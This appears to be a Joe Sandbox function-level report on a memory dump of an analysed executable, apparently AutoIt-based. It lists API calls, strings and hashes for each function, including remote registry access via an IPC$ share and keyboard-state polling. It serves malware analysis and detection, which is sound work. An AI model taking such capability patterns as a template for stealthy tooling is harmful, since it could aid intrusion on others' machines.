Function 00DB06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DB07A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DB07BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DB07DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DB0804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00DB082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DB0837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DB083C

Strings

SOFTWARE\Classes\, xrefs: 00DB070E
\IPC$, xrefs: 00DB0784
\CLSID, xrefs: 00DB0724

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 03184c69714a4f82df8ad2266185c221d1b8c968156b349c71a5330a32220c11
Instruction ID: 27991b7b3393f5a39a4b0a38b309a760f47d9e10214e99c8dff7d160be01a18a
Opcode Fuzzy Hash: 03184c69714a4f82df8ad2266185c221d1b8c968156b349c71a5330a32220c11
Instruction Fuzzy Hash: E141F572810229EBDF15EBA4DC95CEEB778FF44351B444129E912A7261EB309E48CBB0

Function 00DD3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DD3C5C
CoInitialize.OLE32(00000000), ref: 00DD3C8A
CoUninitialize.OLE32 ref: 00DD3C94
_wcslen.LIBCMT ref: 00DD3D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00DD3DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00DD3ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00DD3F0E
CoGetObject.OLE32(?,00000000,00DEFB98,?), ref: 00DD3F2D
SetErrorMode.KERNEL32(00000000), ref: 00DD3F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DD3FC4
VariantClear.OLEAUT32(?), ref: 00DD3FD8

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 2a0b4e7e572efa761bdfd9cbe01fcfec8f5987564a9bb836e73e60cefea05188
Instruction ID: 51c3d0098cfa8ca5b963a9cf4ddcc1196c32d4a257e794e9d2900ab0dc9c24e8
Opcode Fuzzy Hash: 2a0b4e7e572efa761bdfd9cbe01fcfec8f5987564a9bb836e73e60cefea05188
Instruction Fuzzy Hash: 91C112716083459F9700DF68C88492BBBE9EF89744F14491EF98A9B351D731EE06CB62

Function 00DC7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00DC7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DC7B8F
SHGetDesktopFolder.SHELL32(?), ref: 00DC7BA3
CoCreateInstance.OLE32(00DEFD08,00000000,00000001,00E16E6C,?), ref: 00DC7BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DC7C74
CoTaskMemFree.OLE32(?,?), ref: 00DC7CCC
SHBrowseForFolderW.SHELL32(?), ref: 00DC7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DC7D7A
CoTaskMemFree.OLE32(00000000), ref: 00DC7D81
CoTaskMemFree.OLE32(00000000), ref: 00DC7DD6
CoUninitialize.OLE32 ref: 00DC7DDC

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: ff3a8b0d4f74f1b14038e7d57e4a8509f799287bb12811d0b6478dd998054e11
Instruction ID: 64a7665e686ae437f8090d4483ef2ee352d833edf7b08cad3f9d9c36f12e3d78
Opcode Fuzzy Hash: ff3a8b0d4f74f1b14038e7d57e4a8509f799287bb12811d0b6478dd998054e11
Instruction Fuzzy Hash: DEC1EA75A04205AFCB14DFA4C884DAEBBB9FF48314B148599E81ADB361D730ED45CFA0

Function 00DE541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DE5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DE5515
CharNextW.USER32(00000158), ref: 00DE5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DE5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DE559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DE55AC

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 495985592a970e08d3816bf6605b0e5292659847a1344ce1398b42e92e59596f
Instruction ID: b557f505af55cbb36a465b4cf468d28d911890626166afa90f9825503aa945dc
Opcode Fuzzy Hash: 495985592a970e08d3816bf6605b0e5292659847a1344ce1398b42e92e59596f
Instruction Fuzzy Hash: 9861C130900689EFDF10AF52EC84AFE3B79EB053A8F144149F965AB295D7708A81DB70

Function 00DAFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DAFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 00DAFB08
VariantInit.OLEAUT32(?), ref: 00DAFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00DAFB3A
VariantCopy.OLEAUT32(?,?), ref: 00DAFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00DAFBA1
VariantClear.OLEAUT32(?), ref: 00DAFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 00DAFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DAFBCC
VariantClear.OLEAUT32(?), ref: 00DAFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DAFBE9

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 947918e70d4cd8dd972150b5b4872775a647e374adbc665fa7761513d5084188
Instruction ID: e435b8ce2cfa16ddabe2f86c3278d98e0433d06f9395e1629d4d4c4d2391a8c3
Opcode Fuzzy Hash: 947918e70d4cd8dd972150b5b4872775a647e374adbc665fa7761513d5084188
Instruction Fuzzy Hash: 1A412035A102199FCB10EFA4D8949ADBBB9FF49354F008069F955EB361D730E946CBB0

Function 00DB9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00DB9CA1
GetAsyncKeyState.USER32(000000A0), ref: 00DB9D22
GetKeyState.USER32(000000A0), ref: 00DB9D3D
GetAsyncKeyState.USER32(000000A1), ref: 00DB9D57
GetKeyState.USER32(000000A1), ref: 00DB9D6C
GetAsyncKeyState.USER32(00000011), ref: 00DB9D84
GetKeyState.USER32(00000011), ref: 00DB9D96
GetAsyncKeyState.USER32(00000012), ref: 00DB9DAE
GetKeyState.USER32(00000012), ref: 00DB9DC0
GetAsyncKeyState.USER32(0000005B), ref: 00DB9DD8
GetKeyState.USER32(0000005B), ref: 00DB9DEA

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 7cfba96a9d9ceb232d2550866486ade895a2a51ba85dd7fd8f65ae43f260b154
Instruction ID: e16b1a2ced8939e986cb4f1a33e21115f9c0823f1f34c442b38dc25380b9224c
Opcode Fuzzy Hash: 7cfba96a9d9ceb232d2550866486ade895a2a51ba85dd7fd8f65ae43f260b154
Instruction Fuzzy Hash: A441B6345047C9A9FF31966188643F5FEA06F12344F4C805EDBC75A6C2DBA5A9C8CBB2

Function 00DD055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00DD05BC
inet_addr.WSOCK32(?), ref: 00DD061C
gethostbyname.WSOCK32(?), ref: 00DD0628
IcmpCreateFile.IPHLPAPI ref: 00DD0636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DD06C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DD06E5
IcmpCloseHandle.IPHLPAPI(?), ref: 00DD07B9
WSACleanup.WSOCK32 ref: 00DD07BF

Strings

Ping, xrefs: 00DD0676

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 215972705bcf3bf2e2cc5f18c77079e7b3c2f5e1a4eeeca533ca047babc494a8
Instruction ID: 2c562ad78f7f1f8af92840c1ada53c1bd68b872e7fcfff960e6c7f6f08f9c38b
Opcode Fuzzy Hash: 215972705bcf3bf2e2cc5f18c77079e7b3c2f5e1a4eeeca533ca047babc494a8
Instruction Fuzzy Hash: F7915D35604341AFD720DF15D488B1ABBE4EF84318F1885AAE8699F7A2C730ED45CFA1

Function 00DD8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00DD8CF3

Part of subcall function 00DB8E54: _wcslen.LIBCMT ref: 00DB8E77

_wcslen.LIBCMT ref: 00DD8D4E
_wcslen.LIBCMT ref: 00DD8D9C
_wcslen.LIBCMT ref: 00DD8DDC
_wcslen.LIBCMT ref: 00DD8E6E

Strings

cdecl, xrefs: 00DD8D48, 00DD8D4D
winapi, xrefs: 00DD8D96, 00DD8D9B
none, xrefs: 00DD8E65, 00DD8E6A
stdcall, xrefs: 00DD8DD6, 00DD8DDB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: edeab89c09f8e03338298d85228cdc3ad13e14e58f3e24aef50e9e0c9bdec863
Instruction ID: 700276ba63f96f2bb62f827b983462dcaae5a1ab112eb34fa0efa5ae9f687b1a
Opcode Fuzzy Hash: edeab89c09f8e03338298d85228cdc3ad13e14e58f3e24aef50e9e0c9bdec863
Instruction Fuzzy Hash: 2751AF31A001169BCF25DF68C8519BEB7A6EF64720B24422AF866E73C4DB31DD40DBB0

Function 00DD372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00DD3774
CoUninitialize.OLE32 ref: 00DD377F
CoCreateInstance.OLE32(?,00000000,00000017,00DEFB78,?), ref: 00DD37D9
IIDFromString.OLE32(?,?), ref: 00DD384C
VariantInit.OLEAUT32(?), ref: 00DD38E4
VariantClear.OLEAUT32(?), ref: 00DD3936

Strings

Invalid parameter, xrefs: 00DD3865
Failed to create object, xrefs: 00DD37E4, 00DD389A
NULL Pointer assignment, xrefs: 00DD381E

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: afe811db705a5a5fe80fffa42b1ab15cac674f39397c4f9a735bb1883c0bd796
Instruction ID: da6c6daf63d365ef617f1b21e731df9256ceb089c6a35743fa2ac8ee931d05b7
Opcode Fuzzy Hash: afe811db705a5a5fe80fffa42b1ab15cac674f39397c4f9a735bb1883c0bd796
Instruction Fuzzy Hash: 36618AB1608701AFD310DF54D889B6ABBE8EF48710F14090AF9859B391D770EE49DBB2

Function 00DC8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00DC8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DC8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DC8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DC8310
SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8324
SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DC838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8395

Strings

*.*, xrefs: 00DC839B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 70e8e514ce1a68b4a64ad5d41a3d330739dd8cd8eb7c7a21445c739f615d097c
Instruction ID: f6e352aa9cd902ab8393654aefb9bb368b60376a1bc53d8429979a5e29fa8d3b
Opcode Fuzzy Hash: 70e8e514ce1a68b4a64ad5d41a3d330739dd8cd8eb7c7a21445c739f615d097c
Instruction Fuzzy Hash: 5E6137725043459FCB10EF64C844E9EB3E8FF89315F04891EE999C7251EB31E949CBA2

Function 00DE8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2

Part of subcall function 00D6912D: GetCursorPos.USER32(?), ref: 00D69141
Part of subcall function 00D6912D: ScreenToClient.USER32(00000000,?), ref: 00D6915E
Part of subcall function 00D6912D: GetAsyncKeyState.USER32(00000001), ref: 00D69183
Part of subcall function 00D6912D: GetAsyncKeyState.USER32(00000002), ref: 00D6919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00DE8B6B
ImageList_EndDrag.COMCTL32 ref: 00DE8B71
ReleaseCapture.USER32 ref: 00DE8B77
SetWindowTextW.USER32(?,00000000), ref: 00DE8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00DE8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00DE8CFF

Strings

p#, xrefs: 00DE8C71
@GUI_DROPID, xrefs: 00DE8C51
@GUI_DRAGFILE, xrefs: 00DE8C9A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#
API String ID: 1924731296-655930031
Opcode ID: f97a43d6624d2c39b7d0c0daf05212751635cba4eea0b573d3452824ddc6564d
Instruction ID: badb13662437f2c2169ea39d3424605fbfe7ba6043bf8141feba141a32c94ce9
Opcode Fuzzy Hash: f97a43d6624d2c39b7d0c0daf05212751635cba4eea0b573d3452824ddc6564d
Instruction Fuzzy Hash: C251BC70104340AFDB14EF15DC96BAA77E4FB88710F50062DF996A72E1CB709A49CB72

Function 00DC3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DC33CF

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DC33F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00DC3504
Line %d (File "%s"):, xrefs: 00DC3443, 00DC345C
^ ERROR , xrefs: 00DC349E
Error: , xrefs: 00DC34D1
Incorrect parameters to object property !, xrefs: 00DC34AB
"%s" (%d) : ==> %s:, xrefs: 00DC3522

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 7e45eb25193ec1c706ba62bd8a5eb7b039e135d81aeccffd791b1e655aca886b
Instruction ID: f9de180f670e6e92fb50a47cc506d67078b7639981174e7a61ca03272ea02ef3
Opcode Fuzzy Hash: 7e45eb25193ec1c706ba62bd8a5eb7b039e135d81aeccffd791b1e655aca886b
Instruction Fuzzy Hash: D051797290020AAADF15EBA0CD52EEEB779EF14341F244165F905730A2EB316F99CB70

Function 00DBB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DBB5FC
_wcslen.LIBCMT ref: 00DBB608
_wcslen.LIBCMT ref: 00DBB64D
_wcslen.LIBCMT ref: 00DBB68C
_wcslen.LIBCMT ref: 00DBB6C7

Strings

APPEND, xrefs: 00DBB6C1, 00DBB6C6
KEYS, xrefs: 00DBB647, 00DBB64C
EXISTS, xrefs: 00DBB686, 00DBB68B
REMOVE, xrefs: 00DBB602, 00DBB607

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 6ad15218f09500dca10aa99b01fff82265be3f77eac72aa4a00faaf782a882a1
Instruction ID: 99cc6154f2e853f21b9efd8b6e97aa20e636e63ae656d6fa73455d42f912e074
Opcode Fuzzy Hash: 6ad15218f09500dca10aa99b01fff82265be3f77eac72aa4a00faaf782a882a1
Instruction Fuzzy Hash: 8441B632A00126DBCB205F7D88915FE7BA5ABA0774B28412BE466DF284E771CD81C7B0

Function 00DC5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DC53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DC5416
GetLastError.KERNEL32 ref: 00DC5420
SetErrorMode.KERNEL32(00000000,READY), ref: 00DC54A7

Strings

READONLY, xrefs: 00DC5452
INVALID, xrefs: 00DC5459
UNKNOWN, xrefs: 00DC5444
NOTREADY, xrefs: 00DC544B
READY, xrefs: 00DC5460, 00DC5468

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 12c313aa49164c4c00ee92791fb2155e24e80b77d8bf502cea106b11a24ad4bc
Instruction ID: 27b75c66efd9feb9e30cdde1960b383220ec431eb7fcd0f7b61b34ae2ac2874c
Opcode Fuzzy Hash: 12c313aa49164c4c00ee92791fb2155e24e80b77d8bf502cea106b11a24ad4bc
Instruction Fuzzy Hash: 2C31B335A046059FCB15DF68D885FA97BB4EB45305F188059E801DB256DB30EDC6CBB0

Function 00DE3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00DE3C79
SetMenu.USER32(?,00000000), ref: 00DE3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DE3D10
IsMenu.USER32(?), ref: 00DE3D24
CreatePopupMenu.USER32 ref: 00DE3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DE3D5B
DrawMenuBar.USER32 ref: 00DE3D63

Strings

